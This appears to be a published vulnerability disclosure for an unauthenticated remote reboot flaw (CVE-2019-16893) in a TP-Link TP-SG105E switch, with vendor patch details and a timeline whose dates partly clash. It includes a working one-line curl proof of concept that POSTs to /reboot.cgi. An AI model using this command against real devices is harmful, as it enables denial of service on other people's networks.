# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot# Date: 2020-01-20# Exploit Author: PCEumel# Vendor Homepage: https://www.tp-link.com/# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware# Version: TP-Link TP-SG105E V4# Tested on: TP-SG105E V4 1.0.0 Build 20181120# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip# CVE : CVE-2019-16893# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".# It features a web front end and an application (Easy Smart Configuration Utility)# for easy configuration management.# The device does not properly restrict access to an internal API.# It is therefore possible to remotely reboot the device by sending a HTTP POST# request.---# POC :
curl -d "reboot_op=reboot"-X POST http://192.168.1.10/reboot.cgi
---
Timeline :2019-09-16| Vendor notified
2019-09-25| Reply (they will patch it)2019-12-24| First patch for testing
2019-12-19| Confirmed the functionality of the patch
2020-01-14| Public patch available
